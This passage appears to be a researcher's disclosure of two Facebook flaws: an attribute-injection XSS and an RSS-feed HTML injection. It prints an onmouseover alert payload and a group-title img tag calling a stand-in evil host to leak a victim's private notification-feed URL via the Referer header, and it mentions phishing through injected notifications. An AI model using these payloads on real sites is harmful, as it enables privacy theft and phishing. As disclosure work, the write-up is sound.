<img some_controllable_property=" onmouseover=alert(1) " src=...

and if the user adds the appropriate (img:id) in the href attribute of an anchor element, the html could end up displayed as

<a href="http://www.somewebsite.com/#<img some_controllable_property=" onmouseover=alert(1) " src="..."/>...

Which would execute JavaScript code controlled by the attacker (in this example, message box would be shown) if a user moves a mouse pointer over the link in the doc.

Note that, even though there is no possibility for using this as stored XSS in the current version of Facebook, I still think it's better to report this right away (It's obviously a bug) than to sit on it and wait for it to become more critical in the future.


Bug #2: Notification RSS feed HTML injection

Some background: every Facebook user has a notification RSS feed accessible through the http://www.facebook.com/notifications page. The RSS feed URL has the form

http://www.facebook.com/feeds/notifications.php?id=[id]&viewer=[viewer]&key=[key]format=rss20

To view the Facebook notifications of any user you just need to have his/her notification feed URL.

The bug is caused by the 'description' field in the RSS feed not being properly sanitized which enables arbitrary html code to be injected in the RSS feed. Although no JavaScript can be executed in the context of Facebook this way (at least it shouldn't in any decent RSS viewer) the bug could be used to disclose a notification feed URL to the attacker. The attacker can do this by injecting an img tag in the user's RSS feed. If the user views his RSS feed in the Internet Explorer (tested on IE8), when the injected image is requested, the URL of the RSS feed is sent in the http referrer header field, and can thus be sent straight to the attacker.

Let's consider the following attack scenario with two Facebook users, an attacker and a victim

1. Attacker creates a Facebook group and sets its title to "<img src="http://www.someevilwebsite.com/test.php">"

2. Attacker adds/invites a victim to the group

3. The group name (unsanitized!) automatically ends up in the notification feed of the victim

4. Victim uses Internet Explorer and clicks on her 'RSS' link in the http://www.facebook.com/notifications

5. The html code in the group title is rendered and the victim's browser makes a request to http://www.someevilwebsite.com/test.php

with the victim's RSS feed URL in the http header field.

6. Attacker listens to all http traffic to www.someevilwebsite.com and thus receives the victim's RSS feed URL from the http header.

7. When the attacker visits this URL he gets all of the victim's Facebook notifications.

A less technical, but perhaps more practical way to exploit this vulnerability would be to use it in social engineering/phishing attacks. For example, the attacker might inject html code in the victim's RSS feed that would make it appear like the user received some other (injected) notification which makes it appear that it's important for the victim to click on a link in that notification. When the victim clicks it he/she might end up on the attacker-controlled fake Facebook login page.

Note that group name was just one example of injecting code into victim's RSS feed, there were probably other attack scenarios for the same vulnerability.